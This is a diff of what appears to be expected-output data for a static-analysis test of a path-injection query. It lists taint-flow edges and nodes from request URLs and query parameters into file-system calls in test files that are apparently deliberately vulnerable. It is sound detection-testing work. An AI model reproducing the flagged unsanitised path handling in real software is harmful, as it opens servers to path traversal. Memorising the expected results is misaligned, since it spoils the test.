provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | 
@@ -944,205 +614,535 @@ edges | torrents.js:6:6:6:45 | loc | torrents.js:7:25:7:27 | loc | provenance | | | torrents.js:6:12:6:45 | dir + " ... t.data" | torrents.js:6:6:6:45 | loc | provenance | | | torrents.js:6:24:6:27 | name | torrents.js:6:12:6:45 | dir + " ... t.data" | provenance | Config | -| typescript.ts:9:7:9:48 | path | typescript.ts:12:29:12:32 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:20:15:20:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:23:15:23:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:30:15:30:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:11:29:11:32 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:19:15:19:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:22:15:22:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:29:15:29:18 | path | provenance | | | typescript.ts:9:14:9:37 | url.par ... , true) | typescript.ts:9:14:9:43 | url.par ... ).query | provenance | Config | | typescript.ts:9:14:9:43 | url.par ... ).query | typescript.ts:9:14:9:48 | url.par ... ry.path | provenance | Config | | typescript.ts:9:14:9:48 | url.par ... ry.path | typescript.ts:9:7:9:48 | path | provenance | | | typescript.ts:9:24:9:30 | req.url | typescript.ts:9:14:9:37 | url.par ... 
, true) | provenance | Config | -| typescript.ts:20:7:20:18 | path3 | typescript.ts:21:39:21:43 | path3 | provenance | | -| typescript.ts:20:15:20:18 | path | typescript.ts:20:7:20:18 | path3 | provenance | | -| typescript.ts:23:7:23:18 | path4 | typescript.ts:24:39:24:43 | path4 | provenance | | -| typescript.ts:23:15:23:18 | path | typescript.ts:23:7:23:18 | path4 | provenance | | -| typescript.ts:30:7:30:18 | path6 | typescript.ts:32:29:32:33 | path6 | provenance | | -| typescript.ts:30:15:30:18 | path | typescript.ts:30:7:30:18 | path6 | provenance | | +| typescript.ts:19:7:19:18 | path3 | typescript.ts:20:39:20:43 | path3 | provenance | | +| typescript.ts:19:15:19:18 | path | typescript.ts:19:7:19:18 | path3 | provenance | | +| typescript.ts:22:7:22:18 | path4 | typescript.ts:23:39:23:43 | path4 | provenance | | +| typescript.ts:22:15:22:18 | path | typescript.ts:22:7:22:18 | path4 | provenance | | +| typescript.ts:29:7:29:18 | path6 | typescript.ts:31:29:31:33 | path6 | provenance | | +| typescript.ts:29:15:29:18 | path | typescript.ts:29:7:29:18 | path6 | provenance | | +nodes +| TaintedPath-es6.js:7:7:7:44 | path | semmle.label | path | +| TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | semmle.label | parse(req.url, true) | +| TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | +| TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | +| TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | semmle.label | join("public", path) | +| TaintedPath-es6.js:9:41:9:44 | path | semmle.label | path | +| TaintedPath.js:9:7:9:48 | path | semmle.label | path | +| TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | +| TaintedPath.js:11:29:11:32 | path | semmle.label | path | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | +| TaintedPath.js:13:45:13:48 | path | semmle.label | path | +| TaintedPath.js:16:33:16:36 | path | semmle.label | path | +| TaintedPath.js:19:33:19:36 | path | semmle.label | path | +| TaintedPath.js:22:33:22:36 | path | semmle.label | path | +| TaintedPath.js:31:31:31:34 | path | semmle.label | path | +| TaintedPath.js:36:3:36:44 | path | semmle.label | path | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:36:20:36:26 | req.url | semmle.label | req.url | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:39:48:39:51 | path | semmle.label | path | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | +| TaintedPath.js:42:45:42:48 | path | semmle.label | path | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:43:51:43:54 | path | semmle.label | path | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:44:50:44:53 | path | semmle.label | path | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| TaintedPath.js:45:52:45:55 | path | semmle.label | path | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | +| TaintedPath.js:46:49:46:52 | path | semmle.label | path | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | semmle.label | pathMod ... 
e(path) | +| TaintedPath.js:47:48:47:51 | path | semmle.label | path | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:48:54:48:57 | path | semmle.label | path | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | +| TaintedPath.js:49:57:49:60 | path | semmle.label | path | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:54:31:54:76 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:54:63:54:69 | req.url | semmle.label | req.url | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:55:31:55:74 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:55:61:55:67 | req.url | semmle.label | req.url | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:56:31:56:73 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:56:60:56:66 | req.url | semmle.label | req.url | +| TaintedPath.js:64:48:64:60 | req.params[0] | semmle.label | req.params[0] | +| TaintedPath.js:73:6:73:47 | path | semmle.label | path | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:73:23:73:29 | req.url | semmle.label | req.url | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | semmle.label | fs.real ... 
c(path) | +| TaintedPath.js:75:44:75:47 | path | semmle.label | path | +| TaintedPath.js:76:14:76:17 | path | semmle.label | path | +| TaintedPath.js:77:32:77:39 | realpath | semmle.label | realpath | +| TaintedPath.js:78:45:78:52 | realpath | semmle.label | realpath | +| TaintedPath.js:109:6:109:47 | path | semmle.label | path | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:109:23:109:29 | req.url | semmle.label | req.url | +| TaintedPath.js:111:23:111:26 | path | semmle.label | path | +| TaintedPath.js:115:7:115:48 | path | semmle.label | path | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| TaintedPath.js:115:24:115:30 | req.url | semmle.label | req.url | +| TaintedPath.js:117:19:117:22 | path | semmle.label | path | +| TaintedPath.js:119:7:119:29 | split | semmle.label | split | +| TaintedPath.js:119:15:119:18 | path | semmle.label | path | +| TaintedPath.js:119:15:119:29 | path.split("/") | semmle.label | path.split("/") | +| TaintedPath.js:121:19:121:23 | split | semmle.label | split | +| TaintedPath.js:121:19:121:33 | split.join("/") | semmle.label | split.join("/") | +| TaintedPath.js:125:19:125:23 | split | semmle.label | split | +| TaintedPath.js:125:19:125:26 | split[x] | semmle.label | split[x] | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | semmle.label | prefix + split[x] | +| TaintedPath.js:126:28:126:32 | split | semmle.label | split | +| TaintedPath.js:126:28:126:35 | split[x] | semmle.label | split[x] | +| TaintedPath.js:128:7:128:38 | concatted | semmle.label | concatted | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | +| TaintedPath.js:128:33:128:37 | split | semmle.label | split | +| TaintedPath.js:129:19:129:27 | concatted | semmle.label | concatted | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | semmle.label | concatted.join("/") | +| TaintedPath.js:131:7:131:39 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:131:20:131:24 | split | semmle.label | split | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | +| TaintedPath.js:132:19:132:28 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | +| TaintedPath.js:134:19:134:23 | split | semmle.label | split | +| TaintedPath.js:134:19:134:29 | split.pop() | semmle.label | split.pop() | +| TaintedPath.js:139:7:139:48 | path | semmle.label | path | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | semmle.label | url.par ... 
, true) | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:139:24:139:30 | req.url | semmle.label | req.url | +| TaintedPath.js:143:29:143:32 | path | semmle.label | path | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:149:29:149:32 | path | semmle.label | path | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:150:29:150:32 | path | semmle.label | path | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:151:29:151:32 | path | semmle.label | path | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:152:29:152:32 | path | semmle.label | path | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | +| TaintedPath.js:167:40:167:43 | path | semmle.label | path | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | +| TaintedPath.js:168:50:168:53 | path | semmle.label | path | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | +| TaintedPath.js:176:38:176:44 | req.url | semmle.label | req.url | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... 
l)).foo | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | +| TaintedPath.js:177:51:177:57 | req.url | semmle.label | req.url | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | +| TaintedPath.js:179:44:179:50 | req.url | semmle.label | req.url | +| TaintedPath.js:184:7:184:48 | path | semmle.label | path | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:184:24:184:30 | req.url | semmle.label | req.url | +| TaintedPath.js:185:31:185:34 | path | semmle.label | path | +| TaintedPath.js:186:45:186:48 | path | semmle.label | path | +| TaintedPath.js:187:35:187:38 | path | semmle.label | path | +| TaintedPath.js:191:7:191:48 | path | semmle.label | path | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:191:24:191:30 | req.url | semmle.label | req.url | +| TaintedPath.js:195:29:195:32 | path | semmle.label | path | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:200:7:200:48 | path | semmle.label | path | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| TaintedPath.js:200:24:200:30 | req.url | semmle.label | req.url | +| TaintedPath.js:202:29:202:32 | path | semmle.label | path | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:205:31:205:34 | path | semmle.label | path | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | +| examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | +| examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | +| examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | semmle.label | ROOT + filePath | +| examples/TaintedPath.js:10:36:10:43 | filePath | semmle.label | filePath | +| express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | +| handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | +| handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | +| handlebars.js:13:73:13:80 | filePath | semmle.label | filePath | +| handlebars.js:15:25:15:32 | filePath | semmle.label | filePath | +| handlebars.js:29:46:29:60 | req.params.path | semmle.label | req.params.path | +| handlebars.js:43:15:43:29 | req.params.path | semmle.label | req.params.path | +| normalizedPaths.js:11:7:11:27 | path | semmle.label | path | +| normalizedPaths.js:11:14:11:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:13:19:13:22 | path | semmle.label | path | +| normalizedPaths.js:14:19:14:29 | './' + path | semmle.label | './' + path | +| normalizedPaths.js:14:26:14:29 | path | semmle.label | path | +| normalizedPaths.js:15:19:15:22 | path | semmle.label | path | +| normalizedPaths.js:15:19:15:38 | path + '/index.html' | 
semmle.label | path + '/index.html' | +| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:16:35:16:38 | path | semmle.label | path | +| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:17:53:17:56 | path | semmle.label | path | +| normalizedPaths.js:21:7:21:49 | path | semmle.label | path | +| normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:21:35:21:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:23:19:23:22 | path | semmle.label | path | +| normalizedPaths.js:24:19:24:29 | './' + path | semmle.label | './' + path | +| normalizedPaths.js:24:26:24:29 | path | semmle.label | path | +| normalizedPaths.js:25:19:25:22 | path | semmle.label | path | +| normalizedPaths.js:25:19:25:38 | path + '/index.html' | semmle.label | path + '/index.html' | +| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:26:35:26:38 | path | semmle.label | path | +| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:27:53:27:56 | path | semmle.label | path | +| normalizedPaths.js:31:7:31:49 | path | semmle.label | path | +| normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:31:35:31:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:36:19:36:22 | path | semmle.label | path | +| normalizedPaths.js:41:21:41:24 | path | semmle.label | path | +| normalizedPaths.js:54:7:54:49 | path | semmle.label | path | +| normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | +| normalizedPaths.js:54:35:54:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:59:19:59:22 | path | semmle.label | path | +| normalizedPaths.js:63:19:63:22 | path | semmle.label | path | +| normalizedPaths.js:63:19:63:38 | path + "/index.html" | semmle.label | path + "/index.html" | +| normalizedPaths.js:68:21:68:24 | path | semmle.label | path | +| normalizedPaths.js:73:7:73:56 | path | semmle.label | path | +| normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:73:35:73:55 | './' + ... ry.path | semmle.label | './' + ... ry.path | +| normalizedPaths.js:73:42:73:55 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:78:22:78:25 | path | semmle.label | path | +| normalizedPaths.js:82:7:82:27 | path | semmle.label | path | +| normalizedPaths.js:82:14:82:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:87:29:87:32 | path | semmle.label | path | +| normalizedPaths.js:90:31:90:34 | path | semmle.label | path | +| normalizedPaths.js:94:7:94:49 | path | semmle.label | path | +| normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:94:35:94:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:99:29:99:32 | path | semmle.label | path | +| normalizedPaths.js:117:7:117:44 | path | semmle.label | path | +| normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | semmle.label | fs.real ... y.path) | +| normalizedPaths.js:117:30:117:43 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:119:19:119:22 | path | semmle.label | path | +| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:120:35:120:38 | path | semmle.label | path | +| normalizedPaths.js:130:7:130:49 | path | semmle.label | path | +| normalizedPaths.js:130:14:130:49 | pathMod ... 
y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:130:35:130:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:135:21:135:24 | path | semmle.label | path | +| normalizedPaths.js:139:7:139:62 | path | semmle.label | path | +| normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:139:48:139:61 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:144:21:144:24 | path | semmle.label | path | +| normalizedPaths.js:148:7:148:58 | path | semmle.label | path | +| normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | semmle.label | 'foo/' ... y.path) | +| normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:148:44:148:57 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:151:21:151:24 | path | semmle.label | path | +| normalizedPaths.js:153:21:153:24 | path | semmle.label | path | +| normalizedPaths.js:160:7:160:49 | path | semmle.label | path | +| normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | +| normalizedPaths.js:160:35:160:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:165:19:165:22 | path | semmle.label | path | +| normalizedPaths.js:170:21:170:24 | path | semmle.label | path | +| normalizedPaths.js:174:7:174:27 | path | semmle.label | path | +| normalizedPaths.js:174:14:174:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:184:19:184:22 | path | semmle.label | path | +| normalizedPaths.js:187:21:187:24 | path | semmle.label | path | +| normalizedPaths.js:189:21:189:24 | path | semmle.label | path | +| normalizedPaths.js:192:21:192:24 | path | semmle.label | path | +| normalizedPaths.js:194:21:194:24 | path | semmle.label | path | +| normalizedPaths.js:199:21:199:24 | path | semmle.label | path | +| normalizedPaths.js:201:7:201:49 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:201:45:201:48 | path | semmle.label | path | +| normalizedPaths.js:205:21:205:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:208:21:208:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:210:21:210:34 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:214:7:214:49 | path | semmle.label | path | +| normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:214:35:214:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:219:3:219:33 | path | semmle.label | path | +| normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | semmle.label | decodeU ... t(path) | +| normalizedPaths.js:219:29:219:32 | path | semmle.label | path | +| normalizedPaths.js:222:21:222:24 | path | semmle.label | path | +| normalizedPaths.js:226:7:226:70 | path | semmle.label | path | +| normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | +| normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | semmle.label | pathMod ... g, ' ') | +| normalizedPaths.js:226:35:226:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:228:21:228:24 | path | semmle.label | path | +| normalizedPaths.js:236:7:236:47 | path | semmle.label | path | +| normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:236:33:236:46 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:238:19:238:22 | path | semmle.label | path | +| normalizedPaths.js:245:21:245:24 | path | semmle.label | path | +| normalizedPaths.js:250:21:250:24 | path | semmle.label | path | +| normalizedPaths.js:254:7:254:47 | path | semmle.label | path | +| normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:254:33:254:46 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:256:19:256:22 | path | semmle.label | path | +| normalizedPaths.js:262:21:262:24 | path | semmle.label | path | +| normalizedPaths.js:267:7:267:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:267:38:267:41 | path | semmle.label | path | +| normalizedPaths.js:270:21:270:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:275:7:275:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:275:38:275:41 | path | semmle.label | path | +| normalizedPaths.js:278:21:278:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:283:7:283:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | semmle.label | pathMod ... 
e(path) | +| normalizedPaths.js:283:38:283:41 | path | semmle.label | path | +| normalizedPaths.js:286:21:286:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:291:7:291:42 | newpath | semmle.label | newpath | +| normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| normalizedPaths.js:291:38:291:41 | path | semmle.label | path | +| normalizedPaths.js:296:21:296:27 | newpath | semmle.label | newpath | +| normalizedPaths.js:303:6:303:26 | path | semmle.label | path | +| normalizedPaths.js:303:13:303:26 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:304:18:304:21 | path | semmle.label | path | +| normalizedPaths.js:309:19:309:22 | path | semmle.label | path | +| normalizedPaths.js:313:19:313:22 | path | semmle.label | path | +| normalizedPaths.js:316:19:316:22 | path | semmle.label | path | +| normalizedPaths.js:320:6:320:49 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:320:23:320:49 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:320:45:320:48 | path | semmle.label | path | +| normalizedPaths.js:325:19:325:32 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:332:19:332:32 | normalizedPath | semmle.label | normalizedPath | +| normalizedPaths.js:339:6:339:46 | path | semmle.label | path | +| normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | +| normalizedPaths.js:339:32:339:45 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:341:18:341:21 | path | semmle.label | path | +| normalizedPaths.js:346:19:346:22 | path | semmle.label | path | +| normalizedPaths.js:354:7:354:27 | path | semmle.label | path | +| normalizedPaths.js:354:14:354:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:356:19:356:22 | path | semmle.label | path | +| normalizedPaths.js:358:7:358:51 | requestPath | semmle.label | requestPath | +| normalizedPaths.js:358:21:358:51 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:358:47:358:50 | path | semmle.label | path | +| normalizedPaths.js:363:21:363:31 | requestPath | semmle.label | requestPath | +| normalizedPaths.js:377:7:377:27 | path | semmle.label | path | +| normalizedPaths.js:377:14:377:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:379:19:379:22 | path | semmle.label | path | +| normalizedPaths.js:381:19:381:29 | slash(path) | semmle.label | slash(path) | +| normalizedPaths.js:381:25:381:28 | path | semmle.label | path | +| normalizedPaths.js:385:7:385:46 | path | semmle.label | path | +| normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | +| normalizedPaths.js:385:35:385:45 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:388:19:388:22 | path | semmle.label | path | +| normalizedPaths.js:399:21:399:24 | path | semmle.label | path | +| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | +| normalizedPaths.js:407:45:407:55 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:407:45:407:66 | req.que ... it('/') | semmle.label | req.que ... it('/') | +| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | semmle.label | pathMod ... 
t('/')) | +| normalizedPaths.js:408:38:408:48 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:408:38:408:59 | req.que ... it('/') | semmle.label | req.que ... it('/') | +| normalizedPaths.js:412:7:412:46 | path | semmle.label | path | +| normalizedPaths.js:412:14:412:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | +| normalizedPaths.js:412:35:412:45 | req.query.x | semmle.label | req.query.x | +| normalizedPaths.js:415:19:415:22 | path | semmle.label | path | +| normalizedPaths.js:426:21:426:24 | path | semmle.label | path | +| other-fs-libraries.js:9:7:9:48 | path | semmle.label | path | +| other-fs-libraries.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:9:24:9:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:11:19:11:22 | path | semmle.label | path | +| other-fs-libraries.js:12:27:12:30 | path | semmle.label | path | +| other-fs-libraries.js:13:24:13:27 | path | semmle.label | path | +| other-fs-libraries.js:14:27:14:30 | path | semmle.label | path | +| other-fs-libraries.js:16:34:16:37 | path | semmle.label | path | +| other-fs-libraries.js:17:35:17:38 | path | semmle.label | path | +| other-fs-libraries.js:19:56:19:59 | path | semmle.label | path | +| other-fs-libraries.js:24:35:24:38 | path | semmle.label | path | +| other-fs-libraries.js:38:7:38:48 | path | semmle.label | path | +| other-fs-libraries.js:38:14:38:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:38:14:38:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | semmle.label | url.par ... 
